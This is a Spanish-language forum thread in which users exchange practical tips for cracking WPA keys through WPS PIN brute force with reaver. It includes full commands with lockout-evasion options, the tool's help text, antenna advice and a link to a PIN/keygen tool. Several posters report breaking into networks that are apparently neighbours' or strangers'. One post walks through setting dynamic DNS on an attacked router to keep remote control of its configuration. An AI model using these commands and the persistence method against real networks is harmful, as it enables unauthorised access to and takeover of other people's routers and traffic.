Ando liado con otro vodafone_XXXX....lleva 2 horas y el 11.35% sin fisuras....parece que pinta bien...quería probar a hacerlo con antenas diferentes guardando sesión y efectivamente,retoma los "progresos" guardados....independientemente de la antena que use.En este caso es la alfa awuso36h y lo que noto a simple vista observando la consola,es que el pin que lanza es cada 4 segundos.....la otra antena era cada 5,lo cual creo hace más rápido el proceso.....avanza un 0,05% cada 20 segundos si no falla ningún pin...
Estoy usando reaver 1.4 instalado en xubuntu 10,por consola....y rula perfectamente.... 12.85% y sigue...

Estoy posteando con la wifi del portátil(ipw2200) y "reaverando" a la vez con la alfa vía usb...el consumo de recursos es ínfimo....otra cosa que quería probar,si habría conflictos con ambas antenas rulando a la par...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 17 Septiembre 2012, 01:01 am
hola los router vodafone es cambiante que un dia no tenga el wps activado y cuando pasa x tiempo se activa o se activa solo o lo activan saludos

depende el filmware que tenga, hay redes que viven bloqueadas y otras q no.

Alguno sabeis el ping por defecto de los roueters routers cuya mac empiezan por 00:27:19:xx:xx:xx

Principalmente hasta que no se verifique que el 99% de los routers con la mac 00:27:99:XX:XX:XX tienen un PIN costante y no cambiante, no se puede afirmar que es por defecto.

TP-Link tengo un par...

(http://i.minus.com/iwQLRmMlsAk1Z.jpg)
(http://i.minus.com/iyVFMWqzAjhg2.jpg)
(http://i.minus.com/if8AGpRJZ8RD.jpg)

router 8c:0c:a3:x:x:x, con wifiway 3.4, reaver 1.3, mismo resultado, bucle indefinido con un mismo pin, cuando llega al 99.99%, invulnerables, 100% diría yo, saludos, a seguir investigando compañeros. :rolleyes:

usaste la versión 1.4 y la 1.3 y te da lo mismo?

La 1.4, del backtrack 5 rc3

Bueno, tengo nueva y buena información.
en ningun sitio consegui encontrar información respecto a lo de que me saque el pin y nada mas...  pero en otras redes si.

Así que teniendo el pin apuntado, se me ha ocurrido probar con la wifi del portatil, que tiene una atheros con muy poca potencia, pero he salido a la terraza, he puesto el reaver con el comando -p xxxxxxxx   (con el pin que me habia sacado mi tarjeta alfa)  y 3 SEGUNDOS Y CLAVE! :D
jejeje


Podria ser una solucion a los que les pasa como a mi... si teneis una antena potente, pero que sólo da el pin, apuntadlo, sacais el portatil a la ventana o lo que sea y luego probais con otra con menos potencia y el comando -p

:D
He sacado 2 onoxxxx en 6 segundos :D jeje



eso es pues las atheros son mejores para el WPS, en muchos casos que probé, tanto RTL8187 se quedo atrás ante un AR9271.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 17 Septiembre 2012, 08:36 am
Pues he vuelto a tener suerte y ha caído otro vodafone_XYYY,donde X es un número e Y una letra mayúscula....esta vez ha tardado bastante menos de la mitad que con la otra antena...ambas tienen el mismo chipset rtl 8187,pero la alfa es poderosa en este campo....aunque ignoro si tendrá algo que ver.
En este caso la mac es 72:C6:1F:XY:XY:YY

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/vodafone7XXX.png)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: novakcs en 17 Septiembre 2012, 13:00 pm
Bueno, me está gustando esto del reaver y la vulnerabilidad WPS ;)

Así que ya que mi alfa 2w con el r3070 no va al 100%, he leido que la AWUS036H , (alfa tambien) con el chip rtl8187L de 1w es la mejor elección.

Aparte, en vez de trabajar solo con la antenita de 5db que lleva, poner esta antena tipo panel para amplificar la señal?
(http://www.microcubo.com/fotos_productos/antena-wifi-panel-20-dbi.1.large.jpg)

Es que ahora tengo la alfa 2w con una antena de 12 dbi y no me llegan demasiado bien casi ninguna.
Es que he leido que las unidireccionales van mucho mejor, y esta de panel no de si es unidireccional, bidireccional u omnidireccional.

Me recomendais esta antena (la de la imagen) para la alfa awus036h? o mejor otra elección? tampoco quiero nada demasiado caro ni grande, esta me cuesta 13 euros.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 17 Septiembre 2012, 13:45 pm
Échale un ojo, aunque no te gusten los entornos gráficos, las opciones por defecto son interesantes

 http://foro.seguridadwireless.net/index.php?topic=47329.msg251555.msg#25155

Interesante página, lo he probado, aprovechando que los 4 primeros dígitos del pin los tenía, me saltó al 90.94%, pero nada ya te digo que no se trata de routers normales, estos 8c:0c:a3, enchufa los 4 primeros dígitos el reaver, pero luego no consigue descifrar los 4 últimos, pero me ha gustado la herramienta, el entorno gráfico y como bien dices las opciones por defecto se ven completitas, tiene alguna opción para guardar las sesiones el minidwep-gtk?? Porque ya sabemos que no son auditorías de 8-10 horas, se demoran muchas horas y tampoco es cuestión de achicharrar el ordenador, saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 17 Septiembre 2012, 14:42 pm
Bueno, me está gustando esto del reaver y la vulnerabilidad WPS ;)

Así que ya que mi alfa 2w con el r3070 no va al 100%, he leido que la AWUS036H , (alfa tambien) con el chip rtl8187L de 1w es la mejor elección.

Aparte, en vez de trabajar solo con la antenita de 5db que lleva, poner esta antena tipo panel para amplificar la señal?

Me recomendais esta antena (la de la imagen) para la alfa awus036h? o mejor otra elección? tampoco quiero nada demasiado caro ni grande, esta me cuesta 13 euros.



La alfa awuso36h es una auténtica máquina en las auditorías wifi....llevo años usándola,esta y otras muchas(desde 2007) y no puedo quejarme en este sentido...eso sí,para navegar se muestra inestable....mi alfa dice que se puede _"upgradear" hasta 7 db.....en cambio tengo otra que tira 23 db y el resultado es el mismo....ambas llevan el mismo chipset rtl 8187 y ambas con una antena externa exactamente igual a la que traen en la caja,sólo compré un kit de  cable de 1 mt y una antena externa normal y corriente(tplink)un pelín más larga y con imán, para no romper la conexión de la antena....ya me pasó que se saltaron las soldaduras y no veas hasta que conseguí repararla....

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/ALFA.jpg)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 17 Septiembre 2012, 18:29 pm
yo me quedaria con una ubiquiti wifistation etc.. muchas redes por ejemplo las thomson con la alfa rtl8187l no funcionan o pierde tiempo en tratar de enlazar. por parte de la antena puedes usar alguna semiparabolica de 18dBi o una grillada de 24dBi... con 1 a 5mtrs de cable.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 17 Septiembre 2012, 18:36 pm
Interesante página, lo he probado, aprovechando que los 4 primeros dígitos del pin los tenía, me saltó al 90.94%, pero nada ya te digo que no se trata de routers normales, estos 8c:0c:a3, enchufa los 4 primeros dígitos el reaver, pero luego no consigue descifrar los 4 últimos, pero me ha gustado la herramienta, el entorno gráfico y como bien dices las opciones por defecto se ven completitas, tiene alguna opción para guardar las sesiones el minidwep-gtk?? Porque ya sabemos que no son auditorías de 8-10 horas, se demoran muchas horas y tampoco es cuestión de achicharrar el ordenador, saludos.

osea que le metes:

Código:
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300 -p xxxx

y te salta al 90% y no te termina de sacar el pin, has probado a meterle el ultimo pin que se queda probando completo?

Código:
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300 -p xxxxxxxx

lo de salvar sesion el wifislax 4.2 lo lleva de serie, solo tienes que buscar en las opciones "salvar sesion reaver" te crea un modulo en el escritorio y luego lo metes en la carpeta base o modules, cuando reinicies la live se cargará, y da igual que ejecutes el reaver desde minidwep-gtk como desde consola, empezará donde hayas guardado


otra cosa que quería probar,si habría conflictos con ambas antenas rulando a la par...

ya he probado yo, y el problema es que se ralentiza mucho el proceso ya que el ap no puede atender a toda la demanda que le hacen mis dos adaptadores (ralink/atheros) y eso con buena conexión, con un ambiente de conexión malo o degradado, el reaver se puede hacer eterno


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 17 Septiembre 2012, 18:59 pm
warcry : Te importa explicarme para que sirve este comando -a y todo eso sacaría el pin metiendo ese comando dime a mi pasa lo mismo mas o menos con las orange se me keda bloqueado el router cuando llega al 91 por ciento y ya no saca la clave ni nada ese comando que tu has puesto yo nunca lo he metido vamos lo desconozco si me lo explicas bien te lo agradecería.

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300 -p xxxx


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 17 Septiembre 2012, 19:02 pm
warcry : Te importa explicarme para que sirve este comando -a y todo eso sacaría el pin metiendo ese comando dime a mi pasa lo mismo mas o menos con las orange se me keda bloqueado el router cuando llega al 91 por ciento y ya no saca la clave ni nada ese comando que tu has puesto yo nunca lo he metido vamos lo desconozco si me lo explicas bien te lo agradecería.

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300 -p xxxx

poff viene en la ayuda:

Código:
wifislax ~ # reaver

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
        -i, --interface=<wlan>          Name of the monitor-mode interface to use
        -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
        -m, --mac=<mac>                 MAC of the host system
        -e, --essid=<ssid>              ESSID of the target AP
        -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
        -o, --out-file=<file>           Send output to a log file [stdout]
        -s, --session=<file>            Restore a previous session file
        -C, --exec=<command>            Execute the supplied command upon successful pin recovery
        -D, --daemonize                 Daemonize reaver
        -a, --auto                      Auto detect the best advanced options for the target AP
        -f, --fixed                     Disable channel hopping
        -5, --5ghz                      Use 5GHz 802.11 channels
        -v, --verbose                   Display non-critical warnings (-vv for more)
        -q, --quiet                     Only display critical messages
        -h, --help                      Show help

Advanced Options:
        -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
        -d, --delay=<seconds>           Set the delay between pin attempts [1]
        -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
        -g, --max-attempts=<num>        Quit after num pin attempts
        -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
        -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
        -t, --timeout=<seconds>         Set the receive timeout period [5]
        -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
        -A, --no-associate              Do not associate with the AP (association must be done by another application)
        -N, --no-nacks                  Do not send NACK messages when out of order packets are received
        -S, --dh-small                  Use small DH keys to improve crack speed
        -L, --ignore-locks              Ignore locked state reported by the target AP
        -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
        -n, --nack                      Target AP always sends a NACK [Auto]
        -w, --win7                      Mimic a Windows 7 registrar [False]

Example:
        reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

wifislax ~ #

eso sin en perfecto protestante jejejeje


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 17 Septiembre 2012, 20:08 pm
P4nd3m0n1um gracias por tu aporte sobre tp-link. Una cosa, tu has conseguido sacar la clave por medio de reaver a algunas de las tp-link?? Lo digo xk me salta el mismo bloqueo que con las orange....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 17 Septiembre 2012, 20:12 pm
warcry: Ya se que viene en la ayuda jajaja pero viene en ingles amigo, si no te importa decirme que significa cada cosa del comando si asin se saca alguna clave mas rápido dime el -a no lo entiendo ni -v ni -s -x y que es s mayuscula esto para que sirviria es que quiero probar si me sirve a mi


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 17 Septiembre 2012, 20:29 pm
warcry: Ya se que viene en la ayuda jajaja pero viene en ingles amigo, si no te importa decirme que significa cada cosa del comando si asin se saca alguna clave mas rápido dime el -a no lo entiendo ni -v ni -s -x y que es s mayuscula esto para que sirviria es que quiero probar si me sirve a mi

has probado con el traductor de google  ;)

a groso

-a auto detecta las mejores opciones avanzadas para atacar el ap en cuestion

-v muestra mensajes no criticos (como trying pin 01234567)

-S es una pequeña mejora de velocidad (yo la verdad no la noto)

-x es el tiempo de espera en caso de 10 errores seguidos (viene bien cuando el ap esta lejos o hay mala señal)

-r intervalo entre pin y pin (poner un intervalo muy bajo para que vaya mas rapido puede repercutir en que no le de tiempo a contestar al ap)

-l esta instruccion es la que mas me gusta, es el tiempo de espera cuando detecta que el ap se bloquea, esto hace que el ataque sea lento para los router con bloqueo de pin erroneos pero constante, luego tarde o temprano saltaran (eso si mas tarde que temprano ya que como ves le tengo 5 minutos de espera  ;D)

PD:elsevi, he estado repasando tus mensajes y si a estas alturas no sabes que puede y que no puede hacer el reaver, es porque no quieres.

estas obcecado en sacar una key que parece que se te resiste. la clave wpa es hoy por hoy segura al no tener un tiempo computacionalmente viable por ningún equipo domestico. luego parece que te queda el reaver como ultima opción y hay ap,s que no cuelan, cuanto antes lo asumas mejor.





Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 18 Septiembre 2012, 01:43 am
P4nd3m0n1um gracias por tu aporte sobre tp-link. Una cosa, tu has conseguido sacar la clave por medio de reaver a algunas de las tp-link?? Lo digo xk me salta el mismo bloqueo que con las orange....

de las que ves ahí, la primera tardo poco más de 9 horas, las demás menos de 4 horas sin bloqueos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 18 Septiembre 2012, 01:50 am
warcry: Pues la verdad que no utilice ese comando haber si se como se utiliza el reaber, pero había cosas que no sabia todo no lo puedo saber aora con ese comando que has puesto es otra cosa mas que he aprendido no probé el traductor por que no se donde hay traductores de ingles no es mi idioma favorito la verdad. Pues la verdad es que si estoy encabezonado en el mismo router es una WPA2 entoces para mi seria un logro conseguir saca una key de una WPA2 con eso ya me quedo contento.por que lo veo difícil y me intriga mas, ya lo tengo mas asumido de que algunos router son muy complicados pero por intentarlo que no quede.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 18 Septiembre 2012, 12:28 pm
Por cierto,tengo una key de un orange de mi vecino....consta de 26 caracteres alfanuméricos,5 tandas de 4 caracteres y una de 2...las letras son mayúsculas todas y por lo que veo son de la A a la F...aunque quizá sea una coincidencia...por si os sirve de algo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kas211006 en 18 Septiembre 2012, 13:02 pm
Hola,
tengo una ONOxxxx wpa ccmp no psk .
Utilizo el wifiway 3.4 con reaver(la version no me acuerdo)
Tengo una alfa 1w.
Comprobe si tenia el wps activado y si lo tenia.

El otro dia estuve unas cuantas horas y me saco unicamente el wps pin pero no la wpa key.
He estado leyendo foros pero no se concreta nada de las posibilidades de como sacar la wpa key con la wps pin.
Luego busque de la manera -p wps-pin(completo)

Hay varias opciones que he barajado:

1-Probar con una Atheros.
2-Problema de la version del reaver.
3-Utilizar el crunch. Que por lo que he leido es como buscar con un like "wps-pin"
o algo asi.
4- Buscar solo con los 4 primeros digitos del wps-pin en vez de con el completo.

¿Podeis decirme si estoy en lo correcto?¿Cual creeis que es lo mas problable?
¿Se pueden sacar ese tipo de wpa ccmp, o solo las psk?

¿Podriais ayudarme?

Gracias
 


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 18 Septiembre 2012, 16:26 pm
malamadre como sacastes esa orange de tu vecino es un livebox2 y todo el mundo esta con esa red que es muy dificil si no te importa pon el procedimiento de como lo conseguiste podria ayudar muchisimo saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 18 Septiembre 2012, 16:30 pm
malamadre como sacastes esa orange de tu vecino es un livebox2 y todo el mundo esta con esa red que es muy dificil si no te importa pon el procedimiento de como lo conseguiste podria ayudar muchisimo saludos

el livebox2 de orange no trae por defecto una clave de 8 caracteres?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 18 Septiembre 2012, 16:35 pm
P4nd3m0n1um con las tp-link tuviste k hacer algo peculiar para poder sacarle la pass??? En mi caso no hay manera, se bloquea al igual que las orange....y se k pertenece a tp-link por la mac porque el essid lo han cambiado.

Otra cosa, estoy con ahora con una red cuya mac empieza por 72:55:9C:xx:xx:xx
, x aora lleva el 50%. a que compañia pertenece?

Otra cosa, se sabe el pin por defecto de la orange cuya mac empieza por 1c:c6:3c:xx:xx:Xx??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 18 Septiembre 2012, 18:56 pm
malamadre como sacastes esa orange de tu vecino es un livebox2 y todo el mundo esta con esa red que es muy dificil si no te importa pon el procedimiento de como lo conseguiste podria ayudar muchisimo saludos
Siento la confusión.
No la he crackeado...tuvo un problema,me llamó y le dí la vuelta al router para verla....y no es el único,otro vecino tiene otro orange y la clave es de 26 caracteres alfanuméricos y curiosamente las letras son de la A-F....No obstante tengo una sesión guardada con reaver de una hora hasta que se ha bloqueado el router...lo dejaré tranquilo y de madrugada retomaré el tema.Lo que sí puedo decir es que se asocia correctamente y coge pines....
Si lo sé,en vez de la pass hubiese pillado el pin y lo habría probado directamente....estoy en ello. :silbar:

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/orange.png)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kas211006 en 19 Septiembre 2012, 15:37 pm
Bueno mi problema se soluciono , probe con la Atheros que tiene mi portatil, y me devolvio mi clave en menos de 8 horas, mucho mejor que la Alfa 1W.
Al parecer para wps funcionan mucho mejor las Atheros.

Tambien estaban en lo cierto:
Si la wps pin es = 1234567
la wpa key es =X1234567XX





Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 19 Septiembre 2012, 19:46 pm

(http://i.minus.com/ite7pL3sSbrTD.png)

Lo típico después de terminal de atacar un router es fijar un "DNS dinámico", que es un DNS Dinámico:

DNS dinámico es un sistema que permite la actualización en tiempo real de la información sobre nombres de dominio situada en un servidor de nombres. El uso más común que se le da es permitir la asignación de un nombre de dominio de Internet a un ordenador con dirección IP variable (dinámica). Esto permite conectarse con la máquina en cuestión sin necesidad de tener que rastrear las direcciones IP.
El DNS dinámico hace posible, siendo de uso frecuente gracias a lo descrito, utilizar software de servidor en una com[El Usuario ha Insultado]dora con dirección IP dinámica, como la suelen facilitar muchos proveedores de Internet para particulares (por ejemplo para alojar un sitio web en el ordenador de nuestra casa, sin necesidad de contratar un hosting de terceros).

Otro uso útil que posibilita el DNS dinámico es poder acceder al ordenador en cuestión por medio del escritorio remoto.

Este servicio es ofrecido, incluso de forma gratuita, por No-IP, CDmon y FreeDNS.

Fuente: http://es.wikipedia.org/wiki/DNS_din%C3%A1mico (http://es.wikipedia.org/wiki/DNS_din%C3%A1mico)

Ahora si bien en que nos beneficia esto? simplemente podemos entrar a las configuraciones de un router remotamente sin tener conexión física o inalámbrica a este y saber que configuraciones le ha aplicado el usuario administrador de este mismo.

Entonces en ves de utilizar por ejemplo la IP del router para entrar http://192.168.1.254 en el caso que estemos conectados a este; vamos a usar un dominio ya pre-establecido para acceder a este mismo. Por ejemplo http://thomsonTG782.myvnc.com y entraremos a las configuraciones desde Internet..

Los pasos son simples primero debemos tener una cuenta en No-IP:

1.- Visitamos http://www.no-ip.com/.
2.- Nos registramos por lo general es aquí: "Services -> Managed DNS -> Free DNS" (http://www.no-ip.com/services/managed_dns/free_dynamic_dns.html)
3.- Una ves que tenemos nuestra cuenta, vamos a ir a: Add Host!
4.- Creamos nuestro Host a gusto:

(http://i.minus.com/ibp19bQdMc9EaA.PNG)

Una ves creado el Host vamos a nuestro router, en este caso un Thomson TG782 y visitamos la configuración como Administrador (http://www.arg-wireless.com.ar/index.php/topic,943.msg4001.html#msg4001).

Una ves que estemos dentro vamos a ir a "Herramientas" -> "DNS Dinamico":

(http://i.minus.com/ixCR9mBhb4SKE.PNG)

y Agregamos el nuevo Host que habíamos creado:

(http://i.minus.com/iTIcbfQp2s1wL.PNG)

y ahora si visitamos: "thomsonTG782.myvnc.com" por ejemplo entrariamos a las configuraciones del Router.

(http://i.minus.com/iQvaZhQ7No7Ws.PNG)

Así tenemos control remoto del router sin tener que tener clave de acceso o estar cableado al mismo.
hola P4nd3m0n1um no tengo muy claro el final, cuando creas el host y lo insertas en el router despues que hay que hacer? porque si pongo la pagina del host que e creado en el navegador no me sale nada y si me quito de la red o estoy conectado ta,poco me seria de gran ayuda que me dijeses qcomo ver el router cuadno ya has puesto odos los datos. salu2
por cierto en ip adrees tiene que ser la misma que en el roter o puede ser otra distinta?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 20 Septiembre 2012, 03:46 am
hola P4nd3m0n1um no tengo muy claro el final, cuando creas el host y lo insertas en el router despues que hay que hacer? porque si pongo la pagina del host que e creado en el navegador no me sale nada y si me quito de la red o estoy conectado ta,poco me seria de gran ayuda que me dijeses qcomo ver el router cuadno ya has puesto odos los datos. salu2
por cierto en ip adrees tiene que ser la misma que en el roter o puede ser otra distinta?

Una ves que configuras los datos ya directamente desde cualquier sitio, actualizando la IP de tu cuenta de NO-IP puede ingresar a las configuraciones del router sin necesidad de ser usuario en el mismo, cambiar, ver y modificar opciones.. etc.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 20 Septiembre 2012, 12:07 pm
P4nd3m0n1um  intenta responderme al ultimo post que te puse. gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 20 Septiembre 2012, 14:47 pm
Vale, no se si a alguien le a pasado pero me quedado un poco loco...resulta de que tengo el pin de una red ya crackeada y cada vez que lo pongo con el -pXXXXXXXX me da un wpa distinta jajajajaja me trollea hasta un router o q es esto.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 20 Septiembre 2012, 20:09 pm
Vale, no se si a alguien le a pasado pero me quedado un poco loco...resulta de que tengo el pin de una red ya crackeada y cada vez que lo pongo con el -pXXXXXXXX me da un wpa distinta jajajajaja me trollea hasta un router o q es esto.

¿Puede ser por ser tkip?
 " TKIP(Temporal Key Integrity Protocol) utiliza una clave por paquete, lo que significa que genera dinámicamente una nueva clave de 128 bits para cada paquete."
"Utiliza el algoritmo RC4 para realizar el cifrado, que es lo mismo que se usa en el cifrado WEP. Sin embargo, una gran diferencia con el WEP es que cambia las claves temporales cada 10.000 paquetes. Esto proporciona un método de distribución dinámico, lo que mejora significativamente la seguridad de la red."


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 20 Septiembre 2012, 20:29 pm
¿Puede ser por ser tkip?
 " TKIP(Temporal Key Integrity Protocol) utiliza una clave por paquete, lo que significa que genera dinámicamente una nueva clave de 128 bits para cada paquete."
"Utiliza el algoritmo RC4 para realizar el cifrado, que es lo mismo que se usa en el cifrado WEP. Sin embargo, una gran diferencia con el WEP es que cambia las claves temporales cada 10.000 paquetes. Esto proporciona un método de distribución dinámico, lo que mejora significativamente la seguridad de la red."

Que movida jajajajaja Hombre tengo otras reds comprobadas, que pone lo de tkip y sin embargo no me ha pasado eso nunca. Lo que puedo decir q la clave de seguridad es demasiado larga eso si, si no he contado mal 64 cifras (numero y letras). Y otra cosa es q la red muestra un essid, y el reaver al terminar pone 'network - (y lo q creo es la mac)'. Ya estoy acostumbrado a que lo mas raro me pase a mi  :D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 20 Septiembre 2012, 20:39 pm
los router teldat de telefónica conexiones de 50 megas, traen por defecto una clave de 64 caracteres y no hay ningún problema, la metes y te conectas, si no te conectas es porque puede que el dhcp este deshabilitado

metele una ip estatica 192.168.1.76/24  por ejemplo y te conectaras


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Septiembre 2012, 01:43 am
P4nd3m0n1um  intenta responderme al ultimo post que te puse. gracias

P4nd3m0n1um con las tp-link tuviste k hacer algo peculiar para poder sacarle la pass??? En mi caso no hay manera, se bloquea al igual que las orange....y se k pertenece a tp-link por la mac porque el essid lo han cambiado.

Otra cosa, estoy con ahora con una red cuya mac empieza por 72:55:9C:xx:xx:xx
, x aora lleva el 50%. a que compañia pertenece?

Otra cosa, se sabe el pin por defecto de la orange cuya mac empieza por 1c:c6:3c:xx:xx:Xx??

ha, no lo vi, todo dependerá del chipset, todos los audito con TP-Link TL-WN722N (v1.8), la MAC Address 72:55:9C no tiene fabricante, pueda que sea un virtual AP. Lo demás de las orange ni idea.

Vale, no se si a alguien le a pasado pero me quedado un poco loco...resulta de que tengo el pin de una red ya crackeada y cada vez que lo pongo con el -pXXXXXXXX me da un wpa distinta jajajajaja me trollea hasta un router o q es esto.

acordate que hay routers que trabajan con múltiples keys, igual de seguro te esta trolleando ajaja



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 21 Septiembre 2012, 02:02 am
acordate que hay routers que trabajan con múltiples keys, igual de seguro te esta trolleando ajaja

Es que pasa eso, q no pasa ni un segundo que pongo el -pXXXXXXXX y ya esta cambiada la contraseña, le vuelvo a dar y otra contraseña....me esta troleando pero bien jajajajaja


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 21 Septiembre 2012, 13:03 pm
Si yo supiera de antemano el pin de un router determinado, cuando le especifique el pin a reaver me daria directamente la clave o comenzaria desde 0?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Seaworth en 21 Septiembre 2012, 15:02 pm
En principio, si le pones el PIN (con la opción "-p" de reaver) debería empezar a probar con ese PIN, y si es el correcto, devolvería la clave en unos instantes.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 21 Septiembre 2012, 22:44 pm
Uséase que si le pones el pin, y no te da la clave, o el router es invulnerable a la auditoría wps o el reaver tiene algún bug? :¬¬


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Seaworth en 22 Septiembre 2012, 15:03 pm
Correcto, podría ser cualquiera de las dos opciones que apuntas (otra opción es que el PIN sea incorrecto).


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 24 Septiembre 2012, 03:16 am
Lo de bug eso no lo entiendo si me lo explicáis o lo agradezco que bug tiene el reaver, se supone que si no saca la clave es por que el pin no es correcto o por que el router se bloquea como mecanismo de defensa que tiene y no te deja sacar nunca la clave verdad.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 24 Septiembre 2012, 08:38 am
Lo de bug eso no lo entiendo si me lo explicáis o lo agradezco que bug tiene el reaver, se supone que si no saca la clave es por que el pin no es correcto o por que el router se bloquea como mecanismo de defensa que tiene y no te deja sacar nunca la clave verdad.

Para explicarlo lo mas simple posible, se puede decir que la comunicación entre el router y el adaptador es la siguiente:

Adaptador: Petición de conexión por WPS?
Router: Ok, cual es el pin?
Adaptador: 11224455
Router: los primeros 4 dígitos son correctos, vuelve a intentarlo!
Adaptador:  11224544
Router: los primeros 7 dígitos son correctos, vuelve a intentarlo!
Adaptador:  11224549
Router: Auntentificación verificada, clave XxxxxXXXxxXXXxxx

Como se ve, la comunicación entre el router y el dispositivo es muy básica, podría decirse que el cifrado WEP es mas difícil de crackear que el WPS, pero hay un problema con las versiones de reaver, hay router que hablan otro idioma, por ejemplo es como si un chino y un español estarían hablando entre si, por seguir los pasos no habría problemas, pero por ejemplo si este cifrado tiene un md5 luego de ser autentificado y no lo indicamos no tenemos la clave, o sale en blanco o nada, también muchos tienen claves temporales pero es muy raro encontrarlas, por eso algunas veces hay que ir cambiando de versiones.

Esto fue simplemente para que se entienda lo mas posible, también hay otros factores.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 24 Septiembre 2012, 16:10 pm
P4nd3m0n1um : Si aora si lo he entendido para yo saber si los 7 primeros dígitos del pin son correctos el reaver, se supone que me tendría que lanzar un M7 verdad a mi siempre se me queda en M4 y se bloquea  lo vuelvo a intentar y resulta que cambia lo demás numero del pin pero me lanza algunas veces M4 o M3 cosas asín si se da el caso de que me lanze un M7 estaría ya muy cerca de sacar la clave verdad tan solo poniendo los 7 primeros números del pin verdad.Pero haber la ultima version que tengo es la wpscragui1.1.8 que viene dentro del wifislax4.2 no hay otra versión mas nueva o es que se quedo la cosa estancada hay.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 25 Septiembre 2012, 02:16 am
P4nd3m0n1um : Si aora si lo he entendido para yo saber si los 7 primeros dígitos del pin son correctos el reaver, se supone que me tendría que lanzar un M7 verdad a mi siempre se me queda en M4 y se bloquea  lo vuelvo a intentar y resulta que cambia lo demás numero del pin pero me lanza algunas veces M4 o M3 cosas asín si se da el caso de que me lance un M7 estaría ya muy cerca de sacar la clave verdad tan solo poniendo los 7 primeros números del pin verdad.Pero haber la ultima versión que tengo es la wpscragui1.1.8 que viene dentro del wifislax4.2 no hay otra versión mas nueva o es que se quedo la cosa estancada hay.

WPSCrackGUI v1.1.9 -BETA-:

 - Base de Datos de Pines: #233.
 - Agregado Keygens -> Tenda (C8:3A:35).
 - Solucionados Errores en General.

DESCARGA: https://sourceforge.net/projects/wpscrackgui/files/Beta/ (https://sourceforge.net/projects/wpscrackgui/files/Beta/)

NOTA: No esta empaquetado ni creado ningún modulo, se puede ejecutar desde un terminal como "./WPSCrackGUIv1.1.9beta.gambas".


